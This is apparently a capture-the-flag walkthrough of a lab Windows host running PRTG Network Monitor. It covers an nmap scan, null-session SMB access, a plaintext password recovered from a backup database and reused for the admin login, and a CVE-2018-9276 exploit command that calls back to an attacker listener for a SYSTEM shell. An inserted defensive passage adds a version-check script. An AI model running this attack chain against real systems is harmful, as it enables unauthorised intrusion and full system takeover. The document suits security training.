# Monitor

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e1dade897fc86489f3596dedb99e6744fe92ced%2Fimage.png?alt=media)

## Nmap

```
kali@kali:~$ nmap 172.31.1.21 -p- -sV

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Indy httpd 18.1.38.11958 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

## SMB

As per usual, I start with a quick null authentication check using `smbclient`. We see that we are able to list shares and then connect to the 'WebBackups' share. From here we have only one item listed, which is a zip file. We use the `get` command to download the file before moving on to inspecting its contents.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f9db6891d1d8cdbaf1a2e1dd2c57be4d1571656f%2Fimage.png?alt=media)

After unzipping the archive with the `unzip` command we see the contents listed below. An immediately interesting file is db.sqlite3, which is a SQLite database file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b420551eb8d05c7cb734fca73a12f2fa2a0dbe%2Fimage.png?alt=media)

Kali comes pre-installed with an application called 'DB Browser for SQLite' which we can use to open db.sqlite3.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d0d65698fe706d17b2c849f4dc42a7882ed36d9%2Fimage.png?alt=media)

Moving over to the 'Browse Data' tab we see we have some credentials: `django:Se7vmMqP0al`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3295ea86f1bf6f41b88fd824fad73c3dfea97856%2Fimage.png?alt=media)

For now we are finished with the database file.

## HTTP

When we head over to the root page of 172.31.1.21 we come to an install of PRTG network monitor.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-247f0c159dd8fdb5eb7b12c57a53e2b68845b274%2Fimage.png?alt=media)

I looked up the default credentials, which are `prtgadmin:prtgadmin`. The default credentials did not grant me access at the login page. I also tried the credentials we pulled from the database earlier and they did not work either.

I then tried the password 'Se7vmMqP0al' with the default PRTG username 'prtgadmin' and was able to log in.

![http://172.31.1.21/welcome.htm](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8b444b045732fec82e8377c94b03fc7208dc4b73%2Fimage.png?alt=media)

## Exploitation

Researching exploits for PRTG Network Monitor at or below version 18.1.38.11958, as shown at the bottom of the root page, we come to quite a few potential exploits. The easiest and most reliable I found was a PoC created by wildkindcc.
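From the defender's side, the same nmap service banner is enough to inventory exposed PRTG instances and flag those at or below the version this writeup names for CVE-2018-9276. The following is an added example (not part of the original writeup or the PoC repository) that parses `nmap -sV` output; the sample output is constructed from the scan above, and the version threshold is the one stated on this page, not a vendor advisory.

```python
import re

# Constructed sample: the relevant lines of the nmap -sV output shown above.
SAMPLE_NMAP = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Indy httpd 18.1.38.11958 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc         Microsoft Windows RPC
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
"""

# Highest PRTG version the writeup treats as in scope for CVE-2018-9276 (assumption:
# taken from this page, not from Paessler's own advisory).
MAX_IN_SCOPE = (18, 1, 38, 11958)

# nmap prints PRTG as "Indy httpd <version> (Paessler PRTG bandwidth monitor)".
PRTG_RE = re.compile(
    r"^(?P<port>\d+)/tcp\s+open\s+\S+\s+Indy httpd (?P<ver>[\d.]+) \(Paessler PRTG"
)


def parse_version(text):
    """'18.1.38.11958' -> (18, 1, 38, 11958); tuples compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def find_prtg(nmap_text):
    """Return a list of (port, version_tuple) for every PRTG banner in the scan output."""
    hits = []
    for line in nmap_text.splitlines():
        m = PRTG_RE.match(line)
        if m:
            hits.append((int(m.group("port")), parse_version(m.group("ver"))))
    return hits


def is_in_scope(version):
    """True when the version is at or below the threshold named in this writeup."""
    return version <= MAX_IN_SCOPE


def assess(nmap_text):
    """Per PRTG instance: (port, version string, needs_patching)."""
    return [
        (port, ".".join(str(p) for p in ver), is_in_scope(ver))
        for port, ver in find_prtg(nmap_text)
    ]


if __name__ == "__main__":
    for port, ver, flagged in assess(SAMPLE_NMAP):
        print(f"port {port}: PRTG {ver} -> {'PATCH / RESTRICT' if flagged else 'ok'}")
```

Pair the version check with a credential check: the writeup gets in only because a password reused from a backup also works for `prtgadmin`, so rotating that account and removing the null-session share would have broken this chain even on an unpatched build.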

{% embed url="https://github.com/wildkindcc/CVE-2018-9276" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-364e02f95437eadfc809bc490b9d980480368839%2Fimage.png?alt=media)

We can then run the exploit with the required parameters.

```
python2 exploit.py -i 172.31.1.21 -p 80 --lhost <IP> --lport 4455 --user prtgadmin --password Se7vmMqP0al
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fd29703fd6c615f92dbd79024a75ab2557de0d02%2Fimage.png?alt=media)

We are now SYSTEM on the server.
